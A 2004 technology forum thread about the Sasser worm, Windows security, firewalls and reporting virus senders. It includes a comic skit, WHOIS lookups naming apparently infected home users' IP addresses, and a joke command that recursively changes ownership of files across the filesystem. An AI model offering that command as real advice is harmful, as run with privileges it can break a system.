Zone Alarm (alarmed): What's all this then? Who's this guy? Where is he trying to go? Why wasn't I alerted?!
Windows: Oh, he's just... a guy.. he came in for a bit.
Zone Alarm: How did he get in??
Windows (frustrated): Through the service entrance, I told you I got a lot of things going through there and don't want you bothering me about it all the time. The last time you blocked off the service entrance noone could get through.
Zone Alarm: Well don't let him out...
Exuent Worm
Zone Alarm:
Windows (ashamed): Out the service entrance.
Zone Alarm: That's it I quit.
Exuent Zone Alarm
THE END
For the last hour my WinXP box has been shutting itself down because of a crash in lsass. It's caused by a program avserve2.exe called being dropped into the Windows\ directory, and added to the startup sequence.
(Note: I haven't had a chance to actually read this thread yet. If someone else has already warned everyone about avserve2.exe, please disregard this message.)
Where do you find the list of shit that windows needs just to boot. So you don't BSOD your machines with a GP? And then can't undo the GP because it won't boot far enough to execute the GP.
Honest question. If you have the answer. Thanks in Advance. I'd love to implement this in several companies I manage.
Who will guard the guards?
66.130.206.191 (modemcable191.206-130-66.mc.videotron.ca) : whois.arin.net
) : whois.arin.net
Le Groupe Videotron Ltee VL-9BL (NET-66-130-0-0-1)
66.130.0.0 - 66.131.255.255
Le Groupe Videotron Ltee VL-D-QS-4282CE00 (NET-66-130-206-0-1)
66.130.206.0 - 66.130.206.255
# ARIN WHOIS database, last updated 2004-05-01 19:15
# Enter ? for additional hints on searching ARIN's WHOIS database.
68.62.154.154 (pcp08146547pcs.tsclos01.al.comcast.net) : whois.arin.net
Comcast Cable Communications, Inc. JUMPSTART-1 (NET-68-32-0-0-1)
68.32.0.0 - 68.63.255.255
Comcast Cable Communications, Inc. TUSCALOOSA-3 (NET-68-62-128-0-1)
68.62.128.0 - 68.62.159.255
# ARIN WHOIS database, last updated 2004-05-01 19:15
# Enter ? for additional hints on searching ARIN's WHOIS database.
4.64.159.82 (atlnga1-ar3-4-64-159-082.atlnga1.dsl-verizon.net
Genuity GNTY-4-0 (NET-4-0-0-0-1)
4.0.0.0 - 4.255.255.255
GTE Intelligent Network Services GTEINS-64-152-30 (NET-4-64-152-0-1)
Who will guard the guards?
The problems is most luser just click "yes" (install, trust, etc) to any dialog box they see.
Who will guard the guards?
I actually suspected that all along. But, when you're fighting a troll, you want to be really sure that the punch you're about to throw will put them on the floor -- 'cause if it doesn't, you're out of a defensive position.
Je fume. Tu fumes. Nous fûmes!
Cost of ownership is quite a relative term IMO.
Example: How do you calculate the cost of having copies of your private email correspondance and selected private documents from your "My Documents" dir emailed out to everybody by a worm like Klez? Let's say you were gay, that's a fast way to get out of the closet! How about confidential information in a company?
Remember, it's nok like they just get emailed around the world to people you don't know anyway, and who probably could care less about you. It's people you regularly have email correspondance with. People who know you!
These kinds of attacks truly are the most damaging to any person or company.
zWhat would an EWOULDBLOCK block, if an EWOULDBLOCK could block would? -- me
yah, so i was bitching bout the average user
... duh ... registry. shoudl it be their?
...
...
a few days ago. sorry bout that, cause i just
realised how much god-da*m time i've spent on
MS's Os'es since DOS came out and i'll just be plain honest with you that more then 80% of my
time using the computer after win 3.11 was just
getting to know the software/os.
by god, WHERE IS ALL THE DOCUMENTATION!!!!
why do i have to go to a "any" site to find out
about XP services?
why is there no database on a MICROSOFT-domain that
tells me WHAT should be in the registry and what not? like i found this "k=ku+" registry key in
my
what about all these executables in windows dir and system32 directory. WHAT DO THEY DO?
15 years of trial-and-error since using MS
using MS for the sake of it. sure starting to feel
like a religion
"please check with your administrator", e.g. me?
The patch was initially released and still shows April 11th as the release date. However, if you download the patch on April 28th or later you'll see they fixed bugs in it and re-posted the file with the same original date instead of creating a new entry for April 28th. I got lucky and read about this on netcraft.
This is scary shit to me since there is now no easy way to know if MS has fixed a fix. Bad form Microsoft, bad form.
Sorry to be pedandic,
find / -name "*base*" -exec chown -R us {} \;
works better.
Yeah, but not everyone is as fastidious as you. In my line of work, I have experienced all sorts of idiots who shouldn't be allowed to use a pocket calculator, never mind the Internet. I've had to deal with people who don't know the difference between an e-mail address and a website URL, and even one person who didn't know the difference between an e-mail address and their own name! And the scary part is, these were the most tech-literate people working for their own companies. I've tried saying to people, "Get your IT person to set your Outlook Express {they always use that, despite the fact that anyone with half a brain knows how terrible it is} up with these parameters ....." and found that the clueless tosser on the other end was the IT person. {Even if our internal "no source, no sale" policy didn't forbid using Outlook Express our end, it would still be such a horrible buggy piece of software we wouldn't touch it with a barge pole; but these people insist on using it}. If they were running Linux, I could just get them to temporarily set a new root password, SSH into their box, set everything up for them, and that would be Job Done.
Well-set-up Windows systems can be much more secure than badly-set-up Linux systems. The trouble is that Linux users tend to {have to} be more clued-up. Part of the problem is the way Windows is pre-installed on so many machines. The supplier has to keep everything as general-purpose as possible, because they don't know what requirements the user's ISP will place on them -- which, in practice, means rather permissive defaults. In turn, the fact that it just works at first, despite the unnecessary ports and services, leads users not to think about security until it's too late already. With Linux {some obsolete RedHat versions excepted}, everything starts off inactive -- you have to select only what you want to allow. But that probably would also happen if users had to install Windows for themselves; or, even if pre-installed Windows systems had to be configured up from a "deny-all" situation. It means you have to use your brain a little bit, but that's hardly a bad thing -- as harsh as this may sound, it's more important that the job should be done properly, for the sake of other Internet users, than easily and maybe badly.
Je fume. Tu fumes. Nous fûmes!
Hmmmm... I honestly want to know why I need a firewall. I run linux. I know exactly which ports are open (lsof, netstat and nmap can tell me), only the ones that should be, and I use tcp-wrappers when I want to limit access to a subnet.
Exactly what would a firewall do for me?
Opinions stated are mine and do not reflect those of the Illuminati
This is a very helpful free tool: It can scan IP ranges for computers that are vulnerable to be affected by the Sasser worm. Download here. "A Windows network admin utility for remotely detecting LSASS vulnerability released in the MS04-011 bulletin. Allows you to scan multiple IP ranges and send an alert message to vulnerable systems."
I mean I understand that it replicates and all, but most viruses are programmed to perform specific tasks.
Like popping-up ads on the user's machine, redirecting the user's browsing requests, DDOSing SCO, etc...
What is this viruses goal other than replicating?
I don't know the meaning of the word 'don't' - J
Sloppy, sloppy, sloppy! You can't install Mac OS X on a PC - therefore it's no good for virus removal on one. Same reason I didn't list Yellow Dog Linux.
The other BSDs are OK.
Darwin runs fine on x86, however, and rumours have Apple running OS X internally on x86.
Let's say you are the CIO for a Fortune 500. Is that valid reasoning for not using a firewall?
Security is about levels. Just because you lock all your doors and windows doesn't mean you don't need an alarm/fence/guard dog. Of course, you can run a system that has nothing on it in your house and you probably won't ever have a need for a firewall.
Just as an example, let's say you run a file sharing service on your Linux box (Samba). You figure it's Linux so it's safe, and you don't patch regularly and don't run a firewall. While I personally enjoy Samba, it does have the occasional security flaw and, if unpatched and left open to the world, can potentially be exploited. Patching and/or a firewall can significantly reduce the chances of your system being compromised because (a) the exploit won't work and (b) the attacker can't connect to use the exploit.
I'll go one further, albeit even further off-topic. An aquaintance of mine has so confused the concepts of dial-up, email, and bandwidth that they are actively reselling their own dial-up account. The justification for this astonishing business is the premise that the ISP provides him with unlimited email accounts and bandwidth despite it being very clear that he only gets one dial-up account. Even after trying to explain calmly to the poor fellow that email and bandwidth have to do with the ISP's connection to the rest of the net versus their connection to him, he still is trying to resell his $50 "business" account to 25 "customers" at $10 apiece.
I suspect he'll get away with it for a little while, but sooner or later they will cut him off... or something of his anyway...
This explained nothing to me. Your strange analogies about extra protection seemed completely irrelevant. I just don't see how a firewall gives me extra protection.
I don't run Samba and if I did I would use hosts.allow to limit access to the IPs that should have it. What additional security can iptables (or whatever) give me? I am not making an argument. I just don't understand what it is good for outside a complicated business environment.
The original poster seems to think that it adds some mysterious level of protection that everybody needs.
Opinions stated are mine and do not reflect those of the Illuminati
Sometimes boldness is in fashion. Sometimes only the brave will be bold.
In any case, you can do a 'show all headers'. Look at the 'Recieved' lines... Ignore the first line (it's going to be from your ISP), and any other lines that seem to indicate that your ISP bounced the messages around internal boxes. The next IP after that is going to be either direct from the box, or it's related ISP service. (ignore the name that often turns out to be incorrect/misleading)
Do a 'whois' lookup on that IP, and send an email to the 'abuse' owner of the netblock. (this is where Linux comes in handy). If the IP is the address of a box you know, then you're in trouble.
I actually have a set of perl & shell scripts that take a message with forwarded attachments, peels out each attachment, looks at the headers, does the necessary logic and then emails the responsible ISP. I'm a bit lazy, though. I just look at the reverse DNS and use that to get the name of the responsible ISP.
At that point, I just have to gather up all of the day's virus emails, and forward thtm to 'report@localhost' and let Linux do the rest of the work for me.
Sometimes boldness is in fashion. Sometimes only the brave will be bold.